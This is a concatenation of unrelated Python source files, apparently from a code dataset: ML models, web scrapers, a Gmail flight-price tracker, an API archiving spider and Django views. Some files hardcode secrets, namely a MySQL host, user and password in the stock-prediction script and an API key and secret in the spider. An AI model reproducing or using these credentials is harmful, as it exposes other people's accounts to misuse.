batch_parse(self,sentences,batch_size): # sentences: [[1,2,3,...], [1,2,3,4,...], ...]\n num_sentence=len(sentences)\n all_parsers=[Parser(sentence) for sentence in sentences]\n need_parse=all_parsers[:]\n dependent=[]\n while len(need_parse)>0:\n # 一个句子一个parser,用self.predict()函数对所有句子获取它们的预测状态列表,\n # 每个句子的预测状态列表用来在下面的for循环中不断更新这个句子的parse,直到模拟结束r\n # while循环每进行一轮,数据集中的所有句子的parser更新一次状态,即获得一次预测输出\n # for循环每进行一轮,一个句子更新一次状态,并判断这个句子是否应该结束它的栈状态的更新\n # 随着更新的不断进行,每个句子的依存结果保存在它们自己的parser对象的dep属性中,while循环结束后统一获取\n parsers=need_parse[:batch_size] # list [parser, parser, ...], 长度为句子数\n predict_transitions=self.predict(parsers) # list ['S', 'S', ...], 长度为句子数\n for p,transition in zip(parsers,predict_transitions):\n p.parse([transition]) # parse函数:模拟栈状态,对此时Parser保存的stack\\buffer等按transition的三种结果执行\n if len(p.buffer)==0 and len(p.stack)==1:\n need_parse.remove(p)\n\n dependent=[p.dep for p in all_parsers]\n return dependent\n\n","sub_path":"语言与认知/实验一/Parsing.py","file_name":"Parsing.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"105581936","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef cnn(X_input, n_output, is_training, dropout_rate=0.3):\n # inputs, outputs size, kernel_size만 넣어주면\n # activation function 및 Conv 에 필요한 수치들은 알아서 계산해줌\n L1 = tf.layers.conv2d(inputs=X_input, filters=32, kernel_size=[3, 3], \n activation=tf.nn.relu, padding='same')\n L1 = tf.layers.max_pooling2d(inputs=L1, pool_size=[2, 2], strides=[2, 2], padding='valid')\n L1 = tf.layers.dropout(inputs=L1, rate=dropout_rate, training=is_training)\n\n L2 = tf.layers.conv2d(L1, 64, [3, 3], activation=tf.nn.relu, padding='same')\n L2 = tf.layers.max_pooling2d(L2, [2, 2], [2, 2], padding='valid')\n L2 = tf.layers.dropout(L2, dropout_rate, is_training)\n\n L3 = tf.layers.conv2d(L2, 128, [3, 3], activation=tf.nn.relu, padding='same')\n L3 = tf.layers.max_pooling2d(L3, [2, 2], [2, 2], padding='valid')\n L3 = tf.layers.dropout(L3, dropout_rate, is_training)\n\n L4 = tf.layers.flatten(L3) # FC\n L4 = tf.layers.dense(L4, 256, activation=tf.nn.relu)\n L4 = tf.layers.dropout(L4, dropout_rate, is_training)\n\n model = tf.layers.dense(L4, n_output, activation=None, name='model')\n\n return model","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"654175589","text":"#!/usr/local/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: \n@file: 983.最低票价.py\n@time: 2020/5/6 09:54\n@desc: \n\"\"\"\n\"\"\"\n在一个火车旅行很受欢迎的国度,你提前一年计划了一些火车旅行。在接下来的一年里,你要旅行的日子将以一个名为 days 的数组给出。每一项是一个从 1 到 365 的整数。\n火车票有三种不同的销售方式:\n一张为期一天的通行证售价为 costs[0] 美元;\n一张为期七天的通行证售价为 costs[1] 美元;\n一张为期三十天的通行证售价为 costs[2] 美元。\n通行证允许数天无限制的旅行。 例如,如果我们在第 2 天获得一张为期 7 天的通行证,那么我们可以连着旅行 7 天:第 2 天、第 3 天、第 4 天、第 5 天、第 6 天、第 7 天和第 8 天。\n返回你想要完成在给定的列表 days 中列出的每一天的旅行所需要的最低消费。\n\n示例 1:\n\n输入:days = [1,4,6,7,8,20], costs = [2,7,15]\n输出:11\n解释: \n例如,这里有一种购买通行证的方法,可以让你完成你的旅行计划:\n在第 1 天,你花了 costs[0] = $2 买了一张为期 1 天的通行证,它将在第 1 天生效。\n在第 3 天,你花了 costs[1] = $7 买了一张为期 7 天的通行证,它将在第 3, 4, ..., 9 天生效。\n在第 20 天,你花了 costs[0] = $2 买了一张为期 1 天的通行证,它将在第 20 天生效。\n你总共花了 $11,并完成了你计划的每一天旅行。\n示例 2:\n\n输入:days = [1,2,3,4,5,6,7,8,9,10,30,31], costs = [2,7,15]\n输出:17\n解释:\n例如,这里有一种购买通行证的方法,可以让你完成你的旅行计划: \n在第 1 天,你花了 costs[2] = $15 买了一张为期 30 天的通行证,它将在第 1, 2, ..., 30 天生效。\n在第 31 天,你花了 costs[0] = $2 买了一张为期 1 天的通行证,它将在第 31 天生效。 \n你总共花了 $17,并完成了你计划的每一天旅行。\n \n\n提示:\n\n1 <= days.length <= 365\n1 <= days[i] <= 365\ndays 按顺序严格递增\ncosts.length == 3\n1 <= costs[i] <= 1000\n\"\"\"\nfrom typing import List\n\nclass Solution:\n def mincostTickets(self, days: List[int], costs: List[int]) -> int:\n # 创建初始列表\n dp = [0] * (days[-1]+1)\n # days的索引\n next_day = 0\n # 遍历dp为了更新dp值\n for i in range(len(dp)):\n # 当前天数不是days里面的天数 说明不用出行最小花费等于昨天即可\n if i != days[next_day]:\n dp[i] = dp[i-1]\n else:\n # 获取min(一天前 7天前 30天前 + 各自对应的花销)\n dp[i] = min(dp[max(0, i-1)]+costs[0], dp[max(0, i-7)]+costs[1], dp[max(0, i-30)]+costs[2])\n # days索引加1\n next_day += 1\n return dp[-1]\n\n\na = Solution().mincostTickets([1,4,6,7,8,20], [2,7,15])\nprint(a)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"A daily topic/2020/may/200506__983.最低票价.py","file_name":"200506__983.最低票价.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"188393763","text":"print (\"Welcome to roller coaster!\")\nheight = int(input(\"What is your height in cm?\"))\nbill = 0\nif height >= 120 :\n age = int(input(\"What is your age?\"))\n if age < 12:\n bill = 5\n print(\"Child ticket price is $5.\")\n elif age <= 18:\n bill = 7\n print(\"Youth ticket price is $7.\")\n elif age > 18 and age< 45:\n bill = 12\n print(\"Adult ticket price is $12.\")\n elif age>= 45 and age <= 55:\n print(\"Your ride is free. But You should pay for photo.\")\n want_photo = input(\"Do you want a photo taken? Y or N. \")\n if want_photo == \"Y\":\n bill += 3\n print(f\"Your ticket price is ${bill}\")\nelse:\n print(\"Sorry! You can't ride roller coaster.\")","sub_path":"Day 3/Ticket for photo.py","file_name":"Ticket for photo.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"316950058","text":"#!/usr/bin/env python\n\nimport os\nimport nose\nimport sys\n\nsys.path.append(\"\")\n\n# setup cassandra\nfrom cqlengine import connection\n\ntry:\n CASSANDRA_VERSION = int(os.environ[\"CASSANDRA_VERSION\"])\nexcept:\n print(\"CASSANDRA_VERSION must be set as an environment variable. One of (12, 20, 21)\")\n raise\n\nif os.environ.get('CASSANDRA_TEST_HOST'):\n CASSANDRA_TEST_HOST = os.environ['CASSANDRA_TEST_HOST']\nelse:\n CASSANDRA_TEST_HOST = 'localhost'\n\nif CASSANDRA_VERSION < 20:\n protocol_version = 1\nelse:\n protocol_version = 2\n\nconnection.setup([CASSANDRA_TEST_HOST], protocol_version=protocol_version, default_keyspace='cqlengine_test')\n\nnose.main()\n","sub_path":"bin/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"521441019","text":"'''\r\nhttps://github.com/abhishekchhibber/Gmail-Api-through-Python\r\n'''\r\n\r\n\r\nfrom googleapiclient.discovery import build\r\nfrom httplib2 import Http\r\nfrom oauth2client import file, client, tools\r\nimport datefinder\r\nimport re\r\nimport pandas as pd\r\nimport numpy as np\r\nimport xlrd\r\nimport openpyxl\r\nimport datetime\r\nfrom datetime import datetime as dt\r\n\r\nimport base64\r\nimport email\r\nfrom googleapiclient import errors\r\n\r\n\r\nargs = tools.argparser.parse_args()\r\nargs.noauth_local_webserver = True\r\n\r\nSCOPES = 'https://www.googleapis.com/auth/gmail.readonly'\r\nstore = file.Storage('credentials.json')\r\ncreds = store.get()\r\n\r\nif not creds or creds.invalid:\r\n flow = client.flow_from_clientsecrets('C:\\\\Users\\\\huong.vu\\\\Desktop\\\\Git\\\\Google-Flights-Prices\\\\client_secret.json',\r\n SCOPES)\r\n creds = tools.run_flow(flow, store, args)\r\n\r\nservice = build('gmail', 'v1', http=creds.authorize(Http()))\r\n\r\n# calll the Gmail API, only get 1 of the recent message ids\r\n# First get the message if for the message\r\nresults = service.users().messages().list(userId='me',\r\n maxResults=100, # max record to obtain\r\n q='from: noreply-travel@google.com label:inbox ').execute() # include filter for message\r\n\r\ntime = []\r\nprice_now = []\r\nprice_before = []\r\nairlines = []\r\n\r\ndollar = re.compile(r'\\$\\d+\\,*\\d+')\r\neva = re.compile(r'EVA')\r\n\r\nfor i in range(results['resultSizeEstimate']):\r\n # get the message id from the results object\r\n message_id = results['messages'][i]['id']\r\n\r\n # use the message id to get the actual message, including any attachments\r\n message = service.users().messages().get(userId='me', id=message_id).execute()\r\n # print(message['snippet'])\r\n # for dic in message['payload']['headers']:\r\n # if dic['name'] == 'Subject':\r\n # print(dic['value'])\r\n ''' \r\n we know the structure of a message variable and the information we need is from ['snippet']\r\n and ['payload']['headers'], so we can directly go there without a loop.\r\n Subject and Date are under ['payload']['headers']; however, the object is a list of dictionaries,\r\n so we cant reference by name. So, we have to use a loop to go through.\r\n '''\r\n\r\n '''\r\n If the snippet contains:\r\n 1. 'your tracked flight' with 'EVA Air' => airline = EVA Air\r\n 2. 'your tracked flight' without 'EVA Air' => airline = EVA Air cooperated\r\n 3. 'your tracked flights' => EVA Air and EVA Air cooperated\r\n 4. no 'your track flight(s)' => specify in snippet\r\n '''\r\n # prices = [p for p in dollar.finditer(message['snippet'])]\r\n for dic in message['payload']['headers']:\r\n if dic['name'] == 'Subject':\r\n prices = [p.group() for p in dollar.finditer(dic['value'])]\r\n if prices:\r\n price_now.append(prices[0])\r\n price_before.append(prices[1])\r\n else:\r\n prices = [p.group() for p in re.finditer(dollar, message['snippet'])]\r\n price_now.append(prices[0])\r\n price_before.append(prices[1])\r\n if dic['name'] == 'Date':\r\n date = dt.strptime(dic['value'], '%a, %d %b %Y %H:%M:%S %z').strftime('%m/%d/%y')\r\n time.append(date)\r\n\r\n snippet = message['snippet']\r\n if re.search('tracked flights', snippet):\r\n airlines.append('EVA Air & cooeperated')\r\n elif re.search('tracked flight',snippet) and re.search('EVA Air',snippet):\r\n airlines.append('EVA Air')\r\n elif re.search(r'tracked flight[^s]*', snippet):\r\n airlines.append('EVA cooperated')\r\n else:\r\n prices = [p.end() for p in re.finditer(dollar, snippet)]\r\n spaces = [s.end() for s in re.finditer('\\s', snippet[prices[1]:])]\r\n airlines.append(snippet[prices[1]:(prices[1] + spaces[2])].strip())\r\n if snippet[prices[1]:(prices[1] + spaces[2])].strip() == 'your tracked':\r\n print(message_id)\r\n\r\n\r\n\r\n# reorder data\r\ntime.reverse()\r\nprice_before.reverse()\r\nprice_now.reverse()\r\nairlines.reverse()\r\n\r\n# bring result into data frame\r\ndata = pd.DataFrame(data={'time': time,\r\n 'price_now': price_now,\r\n 'price_before': price_before,\r\n 'airline': airlines})\r\n\r\n# open excel\r\nworkbook = openpyxl.load_workbook('C:\\\\Users\\\\huong.vu\\\\Desktop\\\\Git\\\\Google-Flights-Prices\\\\gmail_flight.xlsx')\r\n# getting sheet in excel\r\nsheet = workbook['Sheet1']\r\n# getting last row in excel sheet\r\nlast_row = sheet.max_row\r\n\r\n# getting historical data\r\nhist_data = pd.DataFrame(data={'time': [sheet.cell(row=d, column=1).value for d in range(2, last_row + 1)],\r\n 'price_now': [sheet.cell(row=d, column=2).value for d in range(2, last_row + 1)],\r\n 'price_before': [sheet.cell(row=d, column=3).value for d in range(2, last_row + 1)],\r\n 'airline': [sheet.cell(row=d, column=4).value for d in range(2, last_row + 1)]})\r\n\r\n# remove duplicates\r\ninsert_data = data.join(hist_data, lsuffix='_new', rsuffix='_hist')\r\ninsert_data = insert_data[pd.isnull(insert_data['time_hist'])].iloc[:, 0:4]\r\n\r\n# write data into excel file\r\nfor k in range(last_row + 1, len(insert_data) + last_row + 1):\r\n try:\r\n sheet.cell(row=k, column=1).value = insert_data['time_new'].iloc[k - last_row - 1]\r\n sheet.cell(row=k, column=2).value = insert_data['price_now_new'].iloc[k - last_row - 1]\r\n sheet.cell(row=k, column=3).value = insert_data['price_before_new'].iloc[k - last_row - 1]\r\n sheet.cell(row=k, column=4).value = insert_data['airline_new'].iloc[k - last_row - 1]\r\n except Exception as e:\r\n print(str(e))\r\n\r\nworkbook.save('C:\\\\Users\\\\huong.vu\\\\Desktop\\\\Git\\\\Google-Flights-Prices\\\\gmail_flight.xlsx')\r\nworkbook.close()\r\n","sub_path":"gmailcode.py","file_name":"gmailcode.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"446638789","text":"from tests.utils import random_string\nfrom tests.functional.header import Header\nfrom tests.functional.user.auth.utils import create_user, sign_in\nfrom tests.functional.bases.base_without_create_project_author import BaseWithoutCreateProjectAuthorTestCase\n\n\nclass ProjectCreateTestCase(BaseWithoutCreateProjectAuthorTestCase):\n\n def test_create_project_check_auth_fail(self):\n\n with self.app.test_client() as test_client:\n response = test_client.post('/projects/')\n assert response.status_code == 401\n\n def test_create_project_check_auth_success(self):\n \n with self.app.test_client() as test_client:\n\n sign_in(test_client)\n project_data = {\n 'title': random_string(),\n 'description': random_string(),\n 'website': f\"{random_string()}.com\",\n }\n\n response = test_client.post('/projects/', data=project_data)\n\n assert response.status_code == 201\n","sub_path":"tests/functional/project/test_create_project.py","file_name":"test_create_project.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"503368881","text":"\r\n# coding: utf-8\r\n\r\n# In[3]:\r\n\r\n#\r\n# LSTM모델을 이용해서 주가예측\r\n#\r\nimport os\r\nimport settings\r\nimport pandas as pd # 라이브러리\r\nimport numpy as np # 라이브러리\r\nfrom keras.models import Sequential # 딥러닝을 구동하는 데 필요한 케라스 함수\r\nfrom keras.layers import Dense # 딥러닝을 구동하는 데 필요한 케라스 함수\r\nfrom keras.layers import LSTM # 딥러닝을 구동하는 데 필요한 케라스 함수\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom sklearn.metrics import mean_squared_error\r\nimport pymysql # 파이썬에서 mysql연동시켜주는 라이브러리\r\n\r\n\r\n# 데이터셋 생성 함수\r\nlook_back = 1\r\ndef create_dataset(dataset, look_back=1):\r\n dataX, dataY = [], []\r\n for i in range(len(dataset)-look_back-1):\r\n a = dataset[i:(i + look_back)]\r\n dataX.append(a)\r\n dataY.append(dataset[i + look_back])\r\n return np.array(dataX), np.array(dataY)\r\n \r\n#\r\n# 저장되어있는 주식데이터 불러오기\r\n#\r\nsydtpath = os.path.join(settings.BASE_DIR, 'chart_data/%s' % (settings.get_today_str()))\r\nstock_code = \"asiana\"\r\nfullpath = sydtpath + os.path.sep + stock_code + '.csv'\r\npandf = pd.read_csv(fullpath, index_col=\"Date\")\r\n\r\n# 데이터 전처리\r\nnparr = pandf['Close'].values[1:] # 맨처음 'Close'데이터부터 차례대로 nparr에 저장\r\nprint(nparr)\r\nnparr.astype('float32') # float형으로 변환\r\nprint(nparr)\r\nnparr = nparr.reshape(-1,1)\r\nprint(nparr)\r\n \r\n# 정규화 (0~1사이의 값으로 바꿔준다)\r\nscaler = MinMaxScaler(feature_range=(0, 1))\r\nnptf = scaler.fit_transform(nparr)\r\n \r\n# 학습용, 테스트용 데이터로 나누기 (90%를 학습용 데이터, 10%를 테스트용 데이터)\r\ntrain_size = int(len(nptf) * 0.9)\r\ntest_size = len(nptf) - train_size\r\ntrain, test = nptf[0:train_size], nptf[train_size:len(nptf)]\r\nprint(len(train), len(test))\r\n \r\n# 학습을 위한 데이터셋 생성하기 (학습용, 테스트용으로 구분)\r\ntrainX, trainY = create_dataset(train, look_back)\r\ntestX, testY = create_dataset(test, look_back)\r\n \r\n# RNN모델은 3차원 데이터\r\n# trainX, testX값을 [samples, time steps, features] 형태로 reshape\r\ntrainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))\r\ntestX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\r\n \r\n# LSTM모델\r\nmodel = Sequential() # 딥러닝 구조, 층을 설정\r\nmodel.add(LSTM(20, input_shape=(1, 1))) # (timestep, feature) # 층이 추가됨 (add) # 입력층, 첫번째 은닉층 \r\nmodel.add(Dense(1)) # 출력층 (하나)\r\n# 모델을 컴파일 (컴퓨터가 알아들을 수 있도록) # 오차함수, 최적화 방법\r\nmodel.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy']) # metrics : 모델 수행 결과를 나타내게 설정 (과적합 문제 방지)\r\nmodel.fit(trainX, trainY, epochs=1000, batch_size=50, verbose=2) # 모델을 실제로 수행 # batch_size : 전체 데이터를 10개씩 사용\r\n # verbose(로깅) 2 : epoch당 나오게\r\n\r\n# 예측값 평가하기 (얼마나 정확한지)\r\ntestPredict = model.predict(testX)\r\ntestPredict = scaler.inverse_transform(testPredict) # testPredict : 예측 값\r\ntestY = scaler.inverse_transform(testY) # testY : 실제 값\r\ntestScore = math.sqrt(mean_squared_error(testY, testPredict)) # mean_squared_error : 평균 제곱근 오차\r\nprint('Train Score: %.2f RMSE' % testScore) # 예측 값과 실제 값 차이 출력\r\n \r\n# 예측 데이터 출력\r\nlastX = nptf[-1]\r\nlastX = np.reshape(lastX, (1, 1, 1))\r\nlastY = model.predict(lastX)\r\npredict = scaler.inverse_transform(lastY) # 정규화 시킨 값을 역변환\r\nprint('Predict the Close value of final day: %d' % predict) # 데이터 입력 마지막 다음날 종가 예측\r\n \r\n# 차트출력, 저장\r\nplt.plot(testPredict)\r\nplt.plot(testY)\r\n\r\nplt.title('asiana predict graph')\r\n\r\nplt.savefig(\"./chart_picture/asiana.png\",dpi=300)\r\n#plt.show() 자동실행하면 오류\r\n\r\n# 사진 데이터 binary��식으로 바꿔주는 함수\r\ndef convertToBinaryData(filename):\r\n #Convert digital data to binary format\r\n with open(filename, 'rb') as file:\r\n binaryData = file.read()\r\n return binaryData\r\n\r\n\r\n# \r\n# DB테이블 값 삽입 (INSERT)\r\n#\r\n# MySQL Connection 연결\r\nconnection = pymysql.connect(host='222.122.86.187', port=3306, user='geniuses777', password='stock7840',\r\n db='geniuses777', charset='utf8')\r\ntry:\r\n with connection.cursor() as cursor:\r\n sql = 'INSERT INTO stock_hye (company_name, stock_price, image) VALUES (%s, %s, %s) ON DUPLICATE KEY UPDATE stock_price = VALUES(stock_price), image = VALUES(image)'\r\n image = convertToBinaryData(\"C:\\source\\SPF\\chart_picture\\\\asiana.png\")\r\n cursor.execute(sql, ('아시아나항공', int(predict), image)) # 넣으려는 값\r\n connection.commit()\r\n \r\nfinally:\r\n connection.close()\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n","sub_path":"정혜수/SPF/run.py/asiana.py","file_name":"asiana.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"376891136","text":"#!/usr/bin/python\n\"\"\"Example of archiving an MP site to the filesystem.\n\nThis script will spider a Metropublisher instance, download as much as it can\nand write it out to the filesystem.\n\nThis example probably does not work on Windows, help appreciated...\n\"\"\"\n\nimport os\nimport sys\nimport datetime\nimport logging\nimport tempfile\nfrom urlparse import urlparse\nfrom pprint import pprint\nimport json\n\nimport van_api\n\nAPI_KEY = 'mxvsm129bm7RgcGRYedzLersZXGQSwQjMiyilovZL7A'\nAPI_SECRET = 'hSBADtfwcEnxeatj'\nSTART_URL = '/1'\n\ndef mkdirs(path):\n try:\n os.makedirs(path)\n except OSError:\n pass\n\nclass Spider:\n\n def __init__(self, api, start_url, outdir):\n self.api = api\n self.start_url = start_url\n self.outdir = outdir\n\n def run(self):\n todo_urls = set([self.start_url])\n seen_urls = set([])\n media_todo_urls = set([])\n media_seen_urls = set([])\n while todo_urls:\n self.spider_one(seen_urls, todo_urls, media_todo_urls)\n while media_todo_urls:\n self.spider_media(media_seen_urls, media_todo_urls)\n\n def get_outfile(self, url):\n url = urlparse(url)\n path = url.path[1:] # remove leading /\n outfile = os.path.join(self.outdir, path) #not working on windows??\n mkdirs(os.path.dirname(outfile))\n return outfile\n\n def http_handler(self, request, resp):\n headers = resp.getheaders()\n for h, v in headers:\n if h.lower() == 'content-type':\n content_type = v.split(';')[0].strip()\n break\n if content_type == 'application/json':\n outfile = self.get_outfile(request['url'])\n body = resp.read()\n outfile = '%s.json' % outfile\n with open(outfile, 'wb') as f:\n f.write(body)\n else:\n # expects a file download url like: /{iid}/files/{uuid}/download/...\n download_url = request['url']\n download_url = download_url.split('/download')[0]\n outfile = self.get_outfile(download_url)\n outfile = '%s.data' % outfile\n body = None\n with open(outfile, 'wb') as f:\n van_api.write_body_to_file(resp, f)\n return dict(\n status=resp.status,\n headers=headers,\n body=body,\n reason=resp.reason)\n\n def http_handler_media(self, request, resp):\n headers = resp.getheaders()\n for h, v in headers:\n if h.lower() == 'content-type':\n content_type = v.split(';')[0].strip()\n break\n if content_type == 'application/json':\n body = resp.read()\n body_json = json.loads(body)\n if body_json.get('items'):\n outfile = self.get_outfile(request['url'])\n outfile = '%s.json' % outfile\n with open(outfile, 'wb') as f:\n f.write(json.dumps(body_json['items']))\n return dict(\n status=resp.status,\n headers=headers,\n body=body,\n reason=resp.reason)\n\n def spider_one(self, seen_urls, todo_urls, media_todo_urls):\n url = todo_urls.pop()\n logging.info('Spidering: %s' % url)\n assert url not in seen_urls\n seen_urls.add(url)\n go_urls = set([])\n resp = self.api.request('GET', url, http_handler=self.http_handler)\n if resp is not None:\n # look for urls in the response\n if 'download_url' in resp:\n go_urls.add(resp['download_url'])\n if 'items' in resp:\n if 'next' in resp:\n next_url = '%s?%s' % (url.split('?')[0], resp['next'])\n go_urls.add(next_url)\n for item in resp['items']:\n if isinstance(item, list):\n url = item[0]\n else:\n url = item['url']\n if '%s/content/' % self.start_url in url:\n media_todo_urls.add('%s/media' % url)\n go_urls.add(url)\n todo_urls.update(go_urls - seen_urls)\n\n def spider_media(self, seen_urls, todo_urls):\n url = todo_urls.pop()\n logging.info('Spidering media: %s' % url)\n assert url not in seen_urls\n seen_urls.add(url)\n go_urls = set([])\n resp = self.api.request('GET', url, http_handler=self.http_handler_media)\n todo_urls.update(go_urls - seen_urls)\n\n\ndef connect(api_key, api_secret, endpoint='api.metropublisher.com'):\n logging.info(\"Connection to the API\")\n credentials = van_api.ClientCredentialsGrant(api_key, api_secret)\n return van_api.API(endpoint, credentials)\n\ndef get_outdir():\n outdir = 'MP-export-%s' % datetime.datetime.now().isoformat()\n return os.path.join(os.curdir, outdir)\n\ndef main():\n logging.basicConfig(level=logging.INFO, format='%(levelname)s:%(message)s')\n logging.info('Connecting to API')\n api = connect(API_KEY, API_SECRET)\n outdir = get_outdir()\n logging.info('Saving result to %s' % outdir)\n s = Spider(api, START_URL, outdir)\n s.run()\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/archive_to_filesystem.py","file_name":"archive_to_filesystem.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"596520364","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport argparse\nimport re\n\n\nTIMEOUT = 11 # seconds\nSHOWS_LIMIT = 200\n\n\ndef check_positive(value):\n ivalue = int(value)\n if ivalue <= 0:\n raise argparse.ArgumentTypeError(\"{} is an invalid positive int value\".format(value))\n return ivalue\n\n\ndef get_film_list_from_afisha_page():\n response = requests.get('http://www.afisha.ru/msk/schedule_cinema/')\n films_soup = BeautifulSoup(response.text, 'html5lib')\n films_list = films_soup.find_all(\"div\", {\"class\": \"m-disp-table\"})\n return [x.a.text.strip() for x in films_list]\n\n\ndef fetch_movie_info(response_text):\n film_soup = BeautifulSoup(response_text, 'html5lib')\n movie_info = {}\n try:\n movie_info['rating'] = float(film_soup.find(\"span\", {\"class\": \"rating_ball\"}).text)\n except AttributeError:\n movie_info['rating'] = 0\n try:\n shows_str = film_soup.find(\"div\", {\"class\": \"shows\"}).a.text\n movie_info['shows'] = re.sub(\"[^0-9]\", \"\", shows_str)\n except AttributeError:\n movie_info['shows'] = 0\n return movie_info\n\n\ndef output_movies_to_console(movies, quantity):\n for number, movie in enumerate(sort_movie_list_by_rating(movies), start=1,):\n print('{} \"{}\" has rating {} and {} shows'.format(number, movie['title'], movie['rating'], movie['shows']))\n if number == quantity:\n break\n\n\ndef sort_movie_list_by_rating(movies):\n sorted_by_rating_movie_list = sorted(movies, key=lambda k: k['rating'], reverse=True)\n return [x for x in sorted_by_rating_movie_list if int(x['shows']) > SHOWS_LIMIT]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Movies quantity')\n parser.add_argument('movies_quantity', type=check_positive, help='How many movies to show')\n args = parser.parse_args()\n\n movies_quantity = args.movies_quantity\n movies_info = []\n movies_titles_list = get_film_list_from_afisha_page()\n for number, movie_title in enumerate(movies_titles_list, start=1):\n payload = {'first': 'yes', 'kp_query': movie_title}\n headers = {\n 'Accept': '*/*',\n 'Accept-Encoding': 'UTF-8',\n 'Accept-Language': 'en-US,en;q=0.8,ru;q=0.6',\n 'Content-Type': 'text/html;charset=UTF-8',\n 'User-Agent': 'Agent:Mozilla/5.0 (Windows NT 6.1; WOW64))'\n }\n response = requests.get('https://www.kinopoisk.ru/index.php', headers=headers, params=payload)\n if response.status_code == 200:\n movie_dict = fetch_movie_info(response.text)\n movie_dict['title'] = movie_title\n movies_info.append(movie_dict)\n print(\"{}/{} movie parsed\".format(number, len(movies_titles_list)))\n else:\n print(\"Error parsing {}/{} movie\".format(number, len(movies_titles_list)))\n time.sleep(TIMEOUT)\n output_movies_to_console(movies_info, movies_quantity)\n","sub_path":"cinemas.py","file_name":"cinemas.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"585904574","text":"#!/usr/bin/env python3\n\"\"\"Add two numbers while checking for valid characters being passed\"\"\"\n\ndef addition(num1, num2):\n \"\"\"Add two numbers with exception handling\"\"\"\n try:\n return int(num1) + int(num2)\n except ValueError:\n return \"Please input numbers only.\"\n\nwhile True:\n number1 = input(\"Input a number to add (q to quit) \")\n if number1 == 'q':\n break\n number2 = input(\"Input another number to add (q to quit) \")\n if number2 == 'q':\n break\n print(addition(number1, number2))\n","sub_path":"chapter_10/addition.py","file_name":"addition.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"644024012","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404 ,render_to_response\nfrom .models import Cold_Dishes, First_Courses, Salad, Hot_Appetizers, Order\nfrom django.contrib import auth\nfrom .forms import Restaurants_Form\nfrom mysite import settings\nimport os , json\n\n# Create your views here.\n\ndef rest(request):\n result = \"Successful add!\"\n if request.method == \"POST\" and request.POST['name'] and request.POST['weight'] and request.POST['price'] and request.POST['consist'] and request.FILES['image']:\n form = Restaurants_Form(request.POST, request.FILES)\n if form.is_valid():\n upload_file(request.FILES['image'])\n Cold_Dishes.objects.create(name=request.POST['name'],\n weight=request.POST['weight'],\n price=request.POST['price'],\n consist=request.POST['consist'],\n image=request.FILES['image'])\n return render(request,\"main.html\", {'result': result, 'user' : request.user})\n else:\n if request.method == \"GET\":\n return render(request,\"add.html\", {'dishes': Cold_Dishes.objects.all(), 'user' : request.user})\n\n\ndef upload_file(f):\n with open(os.path.join(settings.MEDIA_ROOT,f.name),'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n\ndef cold_dishes(request, Cold_Dishes_id):\n return HttpResponse(\"You're looking at question %s.\" % Cold_Dishes_id)\n\ndef ColdDishes_id(request,id):\n if request.method == \"GET\":\n return render(request,\"Cold_Dishes.html\" , {'dishes': [Cold_Dishes.objects.get(id = int(id))], 'user' : request.user})\n\n\ndef Cold_dishes(request):\n args = {}\n if request.method == 'GET':\n return render(request, \"Cold_Dishes.html\", {'dishes': Cold_Dishes.objects.all(), 'user': request.user})\n\ndef First_courses(request):\n if request.method == 'GET':\n return render(request, \"First_courses.html\", {'first_course': First_Courses.objects.all(), 'user': request.user})\n\ndef Hot_appetizers(request):\n if request.method == 'GET':\n return render(request, \"Hot_Appetizers.html\", {'hot': Hot_Appetizers.objects.all(), 'user': request.user})\n\n\ndef Salad_view(request):\n args = {}\n if request.method == 'GET':\n return render(request, \"Salad.html\", {'salad': Salad.objects.all(), 'user': request.user})\n\ndef Main_view(request):\n if request.method == 'GET':\n return render(request, \"Salad.html\", {'salad': Salad.objects.all(), 'user': request.user})\n #return HttpResponse(request , \"You're looking at question.\" ,{})\n\n\n\ndef hot_view(request):\n return render(request, \"Hot_Appetizers.html\" , {'hot': Hot_Appetizers.objects.all(), 'user': request.user})\n\ndef Menu(request):\n if request.method == 'GET':\n return render(request, \"menu.html\", {'user': request.user})\n #return render_to_response(\"menu.html\", {'username':auth.get_user(request).username}, args)\n\n\ndef search(request):\n rests = Cold_Dishes.objects.none()\n flag 